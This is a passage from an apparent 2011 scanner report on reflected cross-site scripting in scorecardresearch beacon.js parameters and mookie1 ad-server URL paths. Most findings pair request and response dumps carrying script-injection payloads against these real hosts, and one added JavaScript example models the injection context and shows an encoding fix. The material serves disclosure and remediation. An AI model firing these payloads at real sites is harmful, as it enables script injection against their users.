Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 28 Apr 2011 01:28:11 GMT
Date: Thu, 21 Apr 2011 01:28:11 GMT
Content-Length: 3588
Connection: close

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
e;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"6036378", c3:"", c4:"", c5:"", c6:"", c10:"5595a<script>alert(1)</script>2c9f434fa62", c15:"", c16:"", r:""});



3.89. http://b.scorecardresearch.com/beacon.js [c15 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload adce4<script>alert(1)</script>3d3f26af9a3 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=6035233&c3=2&c4=&c5=&c6=&c15=adce4<script>alert(1)</script>3d3f26af9a3 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www4.tinker.com/standard/widget_sm.html?widgetId=1660&eventId=213260&interactionBox=none&baseStyle=white&bgImage=&bgColor=DC0876&paneBgColor=&fontColor=ffffff&linkColor=&brandLogo=&showTitle=&shareLink=&bottomInfo=&roundCorners=&hashTag=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 28 Apr 2011 01:38:46 GMT
Date: Thu, 21 Apr 2011 01:38:46 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"6035233", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"adce4<script>alert(1)</script>3d3f26af9a3", c16:"", r:""});



3.90. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload d44cc<script>alert(1)</script>ab54e256082 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6036378d44cc<script>alert(1)</script>ab54e256082&c3=&c4=&c5=&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.soccernews.com/blatter-wants-stable-fifa/72998/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 28 Apr 2011 01:28:11 GMT
Date: Thu, 21 Apr 2011 01:28:11 GMT
Content-Length: 3588
Connection: close

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"6036378d44cc<script>alert(1)</script>ab54e256082", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.91. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 1f8d4<script>alert(1)</script>99f13ad0bc was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6036378&c3=1f8d4<script>alert(1)</script>99f13ad0bc&c4=&c5=&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.soccernews.com/blatter-wants-stable-fifa/72998/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 28 Apr 2011 01:28:11 GMT
Date: Thu, 21 Apr 2011 01:28:11 GMT
Content-Length: 3587
Connection: close

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
ry{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"6036378", c3:"1f8d4<script>alert(1)</script>99f13ad0bc", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.92. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 414a1<script>alert(1)</script>45fa45c6a7f was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6036378&c3=&c4=414a1<script>alert(1)</script>45fa45c6a7f&c5=&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.soccernews.com/blatter-wants-stable-fifa/72998/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 28 Apr 2011 01:28:11 GMT
Date: Thu, 21 Apr 2011 01:28:11 GMT
Content-Length: 3588
Connection: close

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"6036378", c3:"", c4:"414a1<script>alert(1)</script>45fa45c6a7f", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.93. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied, unmodified, into a double-quoted JavaScript string literal in the returned script (Content-Type: application/x-javascript), the same context as the c4 finding above, not HTML text between tags. The payload 6861c<script>alert(1)</script>a5ac6ae0dda was submitted in the c5 parameter and appears verbatim in the object passed to COMSCORE.beacon().

As with c4, a <script> element inside a JavaScript string literal does not execute, so this payload shows an unencoded reflection rather than script execution. Exploitability depends on whether a double quote or backslash in c5 is echoed raw as well, which this report does not test.

Request

GET /beacon.js?c1=2&c2=6036378&c3=&c4=&c5=6861c<script>alert(1)</script>a5ac6ae0dda&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.soccernews.com/blatter-wants-stable-fifa/72998/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 28 Apr 2011 01:28:11 GMT
Date: Thu, 21 Apr 2011 01:28:11 GMT
Content-Length: 3588
Connection: close

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"6036378", c3:"", c4:"", c5:"6861c<script>alert(1)</script>a5ac6ae0dda", c6:"", c10:"", c15:"", c16:"", r:""});



3.94. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied, unmodified, into a double-quoted JavaScript string literal in the returned script (Content-Type: application/x-javascript), the same context as the c4 and c5 findings above, not HTML text between tags. The payload 84bca<script>alert(1)</script>01db77b50cb was submitted in the c6 parameter and appears verbatim in the object passed to COMSCORE.beacon().

As with c4 and c5, a <script> element inside a JavaScript string literal does not execute, so this payload shows an unencoded reflection rather than script execution. Exploitability depends on whether a double quote or backslash in c6 is echoed raw as well, which this report does not test.

Request

GET /beacon.js?c1=2&c2=6036378&c3=&c4=&c5=&c6=84bca<script>alert(1)</script>01db77b50cb&c10= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.soccernews.com/blatter-wants-stable-fifa/72998/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 28 Apr 2011 01:28:11 GMT
Date: Thu, 21 Apr 2011 01:28:11 GMT
Content-Length: 3588
Connection: close

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"6036378", c3:"", c4:"", c5:"", c6:"84bca<script>alert(1)</script>01db77b50cb", c10:"", c15:"", c16:"", r:""});



3.95. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/11060627171@x90

Issue detail

The value of REST URL parameter 2 (the second path segment, 247B3) is copied into the HREF attribute of an <A> tag, delimited by double quotation marks, in a text/html response. The payload a2aed"><script>alert(1)</script>ea1579b376b was submitted in the REST URL parameter 2 and was echoed unmodified: neither percent-encoded as a URL path segment nor HTML-encoded as an attribute value.

The leading "> closes the HREF attribute and the <A> start tag, so the <script> element that follows lands in the document body and executes. Unlike the beacon.js findings above, this proof of concept does demonstrate arbitrary JavaScript execution, in the b3.mookie1.com origin, for any user who can be made to request the crafted URL.

Request

GET /2/247B3a2aed"><script>alert(1)</script>ea1579b376b/Dominos/11Q2/CPC/728/11060627171@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; Dominos=247B3; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:04:55 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 344
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3a2aed"><script>alert(1)</script>ea1579b376b/Dominos/11Q2/CPC/728/13938222/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...
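
Added example, not the ad server's code. It reconstructs the anchor from the response above, walks the markup with a small state machine to show where the injected <script> ends up (in the body, because the "> prefix closed the attribute, versus harmlessly inside the attribute value when no quote is present), and shows the two encodings that stop the breakout: percent-encoding each path segment and HTML-attribute-encoding the finished URL. The anchor template, the segment list and the htmlAttr helper are constructed here; the hardened builder is a suggested fix, not the server's implementation.

```javascript
// Added example, not the ad server's code. It models how a browser treats
// the reflected value in finding 3.95 and shows the two encodings that stop
// the breakout. The anchor template is reconstructed from the response.

// Minimal markup walker: tracks whether the cursor is in text, inside a tag,
// or inside a quoted attribute value, and records the state at every
// "<script" it meets. Enough to separate "inside an attribute value" (inert)
// from "starts a script element" (executes); it is not a full HTML parser.
function scriptContexts(html) {
  const found = [];
  let state = 'text';            // 'text' | 'tag' | 'dq' | 'sq'
  for (let i = 0; i < html.length; i++) {
    const ch = html[i];
    if (state === 'text') {
      if (html.startsWith('<script', i)) found.push('element');
      if (ch === '<') state = 'tag';
    } else if (state === 'tag') {
      if (ch === '"') state = 'dq';
      else if (ch === "'") state = 'sq';
      else if (ch === '>') state = 'text';
    } else {                     // inside a quoted attribute value
      if (html.startsWith('<script', i)) found.push('attribute');
      if (ch === (state === 'dq' ? '"' : "'")) state = 'tag';
    }
  }
  return found;
}

// Stand-in for the anchor the server emitted: request path segments are
// concatenated straight into the HREF attribute (the server-generated
// serial segment seen in the response is left out of this model).
function vulnerableAnchor(segments) {
  return '<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/' +
         segments.join('/') + '/x90/default/empty.gif?x" target="_top">';
}

// Hardened form (suggested fix), two layers: percent-encode each segment so
// it stays one path segment of the URL, then HTML-attribute-encode the whole
// URL so no character can terminate the quoted attribute.
function htmlAttr(s) {
  return String(s).replace(/&/g, '&amp;').replace(/"/g, '&quot;')
                  .replace(/'/g, '&#39;').replace(/</g, '&lt;')
                  .replace(/>/g, '&gt;');
}
function hardenedAnchor(segments) {
  const url = 'http://b3.mookie1.com/RealMedia/ads/click_lx.ads/' +
              segments.map(encodeURIComponent).join('/') +
              '/x90/default/empty.gif?x';
  return '<A HREF="' + htmlAttr(url) + '" target="_top">';
}

// The report's payload in segment 2, followed by the untouched segments.
const SEG2_PAYLOAD = 'a2aed"><script>alert(1)</script>ea1579b376b';
const SEGMENTS = ['247B3' + SEG2_PAYLOAD, 'Dominos', '11Q2', 'CPC', '728'];

console.log(scriptContexts(vulnerableAnchor(SEGMENTS)));  // [ 'element' ]
console.log(scriptContexts(hardenedAnchor(SEGMENTS)));    // []
```

The same walker applied to a payload without the "> prefix reports 'attribute', which is the inert case that the beacon.js findings earlier in this report correspond to; the scanner's "Certain" rating is justified only when the script lands in element context.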

3.96. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/11060627171@x90

Issue detail

The value of REST URL parameter 3 (the third path segment, Dominos) is copied into the double-quoted HREF attribute of an <A> tag in a text/html response. The payload 8ae76"><script>alert(1)</script>e6d8e4920b2 was submitted in the REST URL parameter 3 and was echoed unmodified, without URL or HTML-attribute encoding.

As in 3.95, the leading "> closes the attribute and the <A> start tag, so the injected <script> element lands in the document body and executes; this proof of concept demonstrates arbitrary JavaScript execution in the b3.mookie1.com origin.

Request

GET /2/247B3/Dominos8ae76"><script>alert(1)</script>e6d8e4920b2/11Q2/CPC/728/11060627171@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; Dominos=247B3; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:04:57 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 346
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/Dominos8ae76"><script>alert(1)</script>e6d8e4920b2/11Q2/CPC/728/1645687049/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.97. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/11060627171@x90

Issue detail

The value of REST URL parameter 4 (the fourth path segment, 11Q2) is copied into the double-quoted HREF attribute of an <A> tag in a text/html response. The payload fa50c"><script>alert(1)</script>f435d50f889 was submitted in the REST URL parameter 4 and was echoed unmodified, without URL or HTML-attribute encoding.

As in 3.95, the leading "> closes the attribute and the <A> start tag, so the injected <script> element lands in the document body and executes; this proof of concept demonstrates arbitrary JavaScript execution in the b3.mookie1.com origin.

Request

GET /2/247B3/Dominos/11Q2fa50c"><script>alert(1)</script>f435d50f889/CPC/728/11060627171@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; Dominos=247B3; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:04:59 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 345
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/Dominos/11Q2fa50c"><script>alert(1)</script>f435d50f889/CPC/728/692216790/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.98. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/11060627171@x90

Issue detail

The value of REST URL parameter 5 (the fifth path segment, CPC) is copied into the double-quoted HREF attribute of an <A> tag in a text/html response. The payload 63980"><script>alert(1)</script>f41eb06de7c was submitted in the REST URL parameter 5 and was echoed unmodified, without URL or HTML-attribute encoding.

As in 3.95, the leading "> closes the attribute and the <A> start tag, so the injected <script> element lands in the document body and executes; this proof of concept demonstrates arbitrary JavaScript execution in the b3.mookie1.com origin.

Request

GET /2/247B3/Dominos/11Q2/CPC63980"><script>alert(1)</script>f41eb06de7c/728/11060627171@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; Dominos=247B3; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:05:01 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 344
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/Dominos/11Q2/CPC63980"><script>alert(1)</script>f41eb06de7c/728/45010016/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.99. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/11060627171@x90

Issue detail

The value of REST URL parameter 6 (the sixth path segment, 728) is copied into the double-quoted HREF attribute of an <A> tag in a text/html response. The payload 5c367"><script>alert(1)</script>9f4a0217226 was submitted in the REST URL parameter 6 and was echoed unmodified, without URL or HTML-attribute encoding.

As in 3.95, the leading "> closes the attribute and the <A> start tag, so the injected <script> element lands in the document body and executes; this proof of concept demonstrates arbitrary JavaScript execution in the b3.mookie1.com origin.

Request

GET /2/247B3/Dominos/11Q2/CPC/7285c367"><script>alert(1)</script>9f4a0217226/11060627171@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; Dominos=247B3; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:05:03 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 346
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/Dominos/11Q2/CPC/7285c367"><script>alert(1)</script>9f4a0217226/1835408583/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.100. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/11060627171@x90

Issue detail

The value of REST URL parameter 7 (the final path segment, 11060627171@x90) is copied into the double-quoted HREF attribute of an <A> tag in a text/html response. The payload db4ff"><script>alert(1)</script>9cb16008c26 was appended to the REST URL parameter 7 and was echoed unmodified, without URL or HTML-attribute encoding. Note that only the part of the segment after the @ is reflected: the response shows the numeric prefix replaced by a server-generated value (356869465), with x90 and the payload following it.

As in 3.95, the leading "> closes the attribute and the <A> start tag, so the injected <script> element lands in the document body and executes; this proof of concept demonstrates arbitrary JavaScript execution in the b3.mookie1.com origin.

Request

GET /2/247B3/Dominos/11Q2/CPC/728/11060627171@x90db4ff"><script>alert(1)</script>9cb16008c26 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; Dominos=247B3; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:05:06 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 337
Content-Type: text/html

